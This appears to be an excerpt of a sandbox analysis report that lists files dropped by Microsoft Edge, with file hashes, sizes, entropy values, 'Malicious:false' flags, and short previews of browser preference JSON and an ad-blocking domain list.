                                                                                                                                                                                                                                                                                                Preview:{"apps_count_check_time":"13385951010573649","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sidebar":{"upsell_trigger_count":1},"fire_local_softlanding_notification":false,"fre":{"has_first_v

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\03c8ff0e-7b08-44c8-9322-aea2d0aeaded.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9259
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.590850816114583
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:mXqsNk5hUEHfx/T0j5Eih/cIyURLl8Rotoel2tBj2Vvl8xI6usHyJMe4WJkhchu/:psNwhP/CViRUejPxI6HyJlkhC/pS4W
                                                                                                                                                                                                                                                                                                MD5:BC40D1F60D5444DB5840A27F0DE408B7
                                                                                                                                                                                                                                                                                                SHA1:3D1C3150DF64E9B693E184C72ADFAB6BCFFD3451
                                                                                                                                                                                                                                                                                                SHA-256:1228AC5B931AAD9AC6E4107AB630519BC5AB587465C74BF7D51D885B939C7ADF
                                                                                                                                                                                                                                                                                                SHA-512:189D725164BE165F5B7AFDDFA71C131B9785158D5D15EC7BF69356EC6134B0E07A489EDAA1A17B6C0A868C65DC5F1F736A6C13DC1579EC4D0453233FE47B7AE7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"apps_count_check_time":"13385951010573649","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sidebar":{"upsell_trigger_count":1},"fire_local_softlanding_notification":false,"fre":{"has_first_v

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1c1fec8e-5094-4824-8260-cf403846b269.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8233
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.480221964979588
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:mXqsNk5hUEHfx/T0j5Eih/cIyURLl8Rotoel2tBj2Vvl62ZjFe4WJkhcq1kZUb0j:psNwhP/CViRUejx2jYkhkVpS41
                                                                                                                                                                                                                                                                                                MD5:043561283B0C087E23F655E6E28A68D7
                                                                                                                                                                                                                                                                                                SHA1:157969816EA0949AAA24E4230A8260EFD7A1520B
                                                                                                                                                                                                                                                                                                SHA-256:A7E2885C9EF8CE8F37618388A51E3195E01607D0D3EA08CED71AF89DE33F54D8
                                                                                                                                                                                                                                                                                                SHA-512:F5940E5190096A5836F171C6A4C61F2374751A6672F64F9E2BA20662AEAE4347783CBCB97B0D3FA5CF6499CFD2F1E529D19BC38F02DC16781CF6E83E1FF137A9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"apps_count_check_time":"13385951010573649","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sidebar":{"upsell_trigger_count":1},"fire_local_softlanding_notification":false,"fre":{"has_first_v

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\37e5a249-6bc5-48a4-b696-90f24e6716ec.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8321
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.7884889468005465
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:fsNwJ/PeiRUoVjYkhk/6qRAq1k8SPxVLZ7VTiB:fsNw9T5Zjhk/6q3QxVNZTiB
                                                                                                                                                                                                                                                                                                MD5:F385E811E51F9E150B5A6C63188E8256
                                                                                                                                                                                                                                                                                                SHA1:6AFE2CA7051DF8B577CA104E36170084ADDAABBC
                                                                                                                                                                                                                                                                                                SHA-256:D2120178812C10656DDF42EDB84C66007BB86D22EFED14AC2496F78EAAD31719
                                                                                                                                                                                                                                                                                                SHA-512:5DFF317422ACC39BFCE36C93BE1D4517160972F93F768531383727F9122B6904933F57CD3643A83932D99713C0DBD532F9D33439FEF53289CC506A7511FBDB12
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3d49e9eb-9cbd-4ec1-900a-6b44f2065e31.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3e8925ab-92d2-4b85-8d36-18780aeb8e6f.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):9259
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.590850816114583
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:mXqsNk5hUEHfx/T0j5Eih/cIyURLl8Rotoel2tBj2Vvl8xI6usHyJMe4WJkhchu/:psNwhP/CViRUejPxI6HyJlkhC/pS4W
                                                                                                                                                                                                                                                                                                MD5:BC40D1F60D5444DB5840A27F0DE408B7
                                                                                                                                                                                                                                                                                                SHA1:3D1C3150DF64E9B693E184C72ADFAB6BCFFD3451
                                                                                                                                                                                                                                                                                                SHA-256:1228AC5B931AAD9AC6E4107AB630519BC5AB587465C74BF7D51D885B939C7ADF
                                                                                                                                                                                                                                                                                                SHA-512:189D725164BE165F5B7AFDDFA71C131B9785158D5D15EC7BF69356EC6134B0E07A489EDAA1A17B6C0A868C65DC5F1F736A6C13DC1579EC4D0453233FE47B7AE7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"apps_count_check_time":"13385951010573649","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sidebar":{"upsell_trigger_count":1},"fire_local_softlanding_notification":false,"fre":{"has_first_v

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6573a7aa-fa00-4344-bf16-c772bd90f34a.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8090
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.813122254122343
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:asNAJ/PeiRUbgQqkhc6qRAq1k8SPxVLZ7VTi3:asNA9Te9phc6q3QxVNZTi3
                                                                                                                                                                                                                                                                                                MD5:BCCABF61CB252E9173DBE8425266943C
                                                                                                                                                                                                                                                                                                SHA1:A9C56C0DC16EB717835D2BA728D57915A820E0B7
                                                                                                                                                                                                                                                                                                SHA-256:CE01724AFE3C5A52CA39B3792F32E6779549E29E1AC8D7FE982EFA9F8766A3DB
                                                                                                                                                                                                                                                                                                SHA-512:CB6920861F24F10CE2AD098940B9C34127E6C3430EE91067C0182F14874A310692E9B65BCE07A6C24AAF06C9733DBF0703DEBE8F61F807A519142C6C84FE70A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6b32c8cb-d032-4225-93e6-bbc22989f355.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):8090
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.813122254122343
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:asNAJ/PeiRUbgQqkhc6qRAq1k8SPxVLZ7VTi3:asNA9Te9phc6q3QxVNZTi3
                                                                                                                                                                                                                                                                                                MD5:BCCABF61CB252E9173DBE8425266943C
                                                                                                                                                                                                                                                                                                SHA1:A9C56C0DC16EB717835D2BA728D57915A820E0B7
                                                                                                                                                                                                                                                                                                SHA-256:CE01724AFE3C5A52CA39B3792F32E6779549E29E1AC8D7FE982EFA9F8766A3DB
                                                                                                                                                                                                                                                                                                SHA-512:CB6920861F24F10CE2AD098940B9C34127E6C3430EE91067C0182F14874A310692E9B65BCE07A6C24AAF06C9733DBF0703DEBE8F61F807A519142C6C84FE70A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8c2206fc-1060-4557-b783-bfb0ebd5bea8.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9259
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.591016347922035
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:mXqsNk5hUEHfx/T0j5Eih/cIyURLl8Rotoel2tBj2Vvl8xI6usE1ke4WJkhchuSE:psNwhP/CViRUejPxI6E1NkhC/pS4W
                                                                                                                                                                                                                                                                                                MD5:0E9B2D9D166B351CA876E77554462599
                                                                                                                                                                                                                                                                                                SHA1:CD96A4013DF2A8D9EDBC5D0B368C4555DABD3943
                                                                                                                                                                                                                                                                                                SHA-256:A898416F51640716D25A83DBE19DD8DF9F24B2FFBFDA9C4BBA18313D4F2AF714
                                                                                                                                                                                                                                                                                                SHA-512:22AC0509057A843C6903501E579EB7C4BD8D4A5DACF3EBA87056F18F4F28C6EFD8017578FA0CE9CFAC9E9F0AFB15D3ADC372F8541B2DCB7E936F6225D1031D5A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"apps_count_check_time":"13385951010573649","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sidebar":{"upsell_trigger_count":1},"fire_local_softlanding_notification":false,"fre":{"has_first_v

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8ce2f886-cb4f-4397-b7a2-6513cd0c14d9.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):24840
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.032286588330584
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:2MkbJ6eg6KzhXRLtkp1hkPojhkMgDXotI:2Mk16zRRSp1hWoI
                                                                                                                                                                                                                                                                                                MD5:F79A35AF81C1D1F402CF97AAB10C97C5
                                                                                                                                                                                                                                                                                                SHA1:40BEE14205CE029757AB5E1E1630846231DB809B
                                                                                                                                                                                                                                                                                                SHA-256:2A4160F02EC46F60986FF167D2CB7CB969A6C060B11FA03DA743951F1C674B82
                                                                                                                                                                                                                                                                                                SHA-512:B733B7BBED8E48D39F2265366DC0CB5F987C435943EE2D4CBBC30EAD4596B09730A243A091DBA5983BD34172C07F0942A9007BB48E5E46CD3BCFB88241674F00
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385951010573649","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.640139629192622
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7d:fwUQC5VwBIiElEd2K57P7d
                                                                                                                                                                                                                                                                                                MD5:2294BA025779C50628FDAB475ACD59D4
                                                                                                                                                                                                                                                                                                SHA1:CCBCAA697CE1AA9F1DAF9D88C214CB51E4381787
                                                                                                                                                                                                                                                                                                SHA-256:CA627CBA3701FC8C0358EF79F7E1AA9CED0B853FE8EE72389172BDED974C431B
                                                                                                                                                                                                                                                                                                SHA-512:C700C8DEB0590992BB6210CDF3E34D0C6F94650525ABB23473D1FF32F8B38D89563C8319305E64FE45BBCB765E6FFD4A76E20127ED8D1C2297D5C3A67E2B971A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\f39ce093-8d3e-4e58-a31e-4a136781d95e.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.640139629192622
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7d:fwUQC5VwBIiElEd2K57P7d
                                                                                                                                                                                                                                                                                                MD5:2294BA025779C50628FDAB475ACD59D4
                                                                                                                                                                                                                                                                                                SHA1:CCBCAA697CE1AA9F1DAF9D88C214CB51E4381787
                                                                                                                                                                                                                                                                                                SHA-256:CA627CBA3701FC8C0358EF79F7E1AA9CED0B853FE8EE72389172BDED974C431B
                                                                                                                                                                                                                                                                                                SHA-512:C700C8DEB0590992BB6210CDF3E34D0C6F94650525ABB23473D1FF32F8B38D89563C8319305E64FE45BBCB765E6FFD4A76E20127ED8D1C2297D5C3A67E2B971A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                                                                MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

